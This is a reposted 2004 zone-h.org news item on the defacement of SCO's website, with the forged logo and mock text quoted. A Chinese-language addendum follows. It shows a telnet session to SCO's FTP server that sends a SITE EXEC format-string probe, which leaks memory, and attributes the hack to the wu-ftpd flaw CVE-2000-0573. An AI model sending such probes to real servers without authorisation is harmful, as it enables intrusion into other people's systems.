News from zone-h.org
www.SCO.com defacement:
SyS64738 and Siegfried, Zone-H.org admins
11/29/2004
It's still there since this early morning: instead of the usual SCO's logo
(www.sco.com), we can see a cleverly forged one, that at the first sight
might look as the usual SCO logo but it actually contains the wordings: WE
OWN ALL YOUR CODE, PAY US ALL YOUR MONEY. followed "by hacked by realloc()"
see the mirror at: http://www.zone-h.org/defaced/2004/11/29/www.sco.com/ or
a screenshot: http://www.zone-h.org/files/77/sco.com.jpg
The site had already been defaced yesterday by the same person at
http://www.sco.com/redhat , the original title "Red Hat v. SCO" was changed
to "SCO vs World" with a text proclaiming that SCO had found parts of their
code in Microsoft products:
"SCO vs World
Recently we found parts of our code in almost all Microsoft(R) software. We
want to bring an action against Microsoft(R) and our legal department is
working on that. Parts of code found in in all Microsoft(R) products from
MS-DOS(TM) 2.1 to Microsoft(R) Windows(TM) Longhorn. Currently we are
checking older MS-DOS sources. It's obvious, that all while (1){
do_something; } and for (i = 0; i < 16; i++) loops came from our code. "
The mirror is available here:
http://www.zone-h.org/defaced/2004/11/29/www.sco.com/redhat/
浏览了一下sco的网站,发现了一个有趣的地方:
[sam@rhas3 sam]$ telnet ftpput.sco.com 21
Trying 216.250.128.195...
Connected to artemis.sco.com (216.250.128.195).
Escape character is '^]'.
USER 220 artemis FTP server (Version 2.1WU(1)) ready.
USER anonymous
331 Guest login ok, send e-mail address as password.
PASS anonymous@xxx.com
230-Welcome to SCO's older FTP Archive Site
230-
230-All transfers from this archive are logged. To bypass this and all other
230-messages, use a "-" as the first character of your password,
230-e.g. "-your_login@company.COM". See the file README.ftp for information
230-regarding the specific features of this FTP server.
230-
230-
230-Please read the file README
230- it was last modified on Fri Dec 11 14:53:57 1998 - 2179 days ago
230-Please read the file README.OSR5.Supplements
230- it was last modified on Fri May 25 11:55:14 2001 - 1284 days ago
230-Please read the file README.UW7.Supplements
230- it was last modified on Tue Jun 19 15:05:36 2001 - 1259 days ago
230-Please read the file README.UW7_NSC.Supplements
230- it was last modified on Wed Jun 13 13:59:57 2001 - 1265 days ago
230-Please read the file README.download
230- it was last modified on Tue Jun 29 12:22:09 1999 - 1979 days ago
230-Please read the file README.ftp
230- it was last modified on Fri Sep 2 16:44:18 1994 - 3739 days ago
230 Guest login ok, access restrictions apply.
SITE EXEC AAAA%x%x%x%x%x%x%x%x%x%x%x
200-aaaad228588767265736374652f7074662f6578652d61612f63782561617825782578257825
200 (end of 'aaaa%x%x%x%x%x%x%x%x%x%x%x')
^]q
Connection closed.
居然还存在一个wu-ftpd 的格式化溢出漏洞,这个漏洞在2000年被发现:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0573
黑客应该是通过这个方法入侵sco.com的
浙公网安备 33010602011771号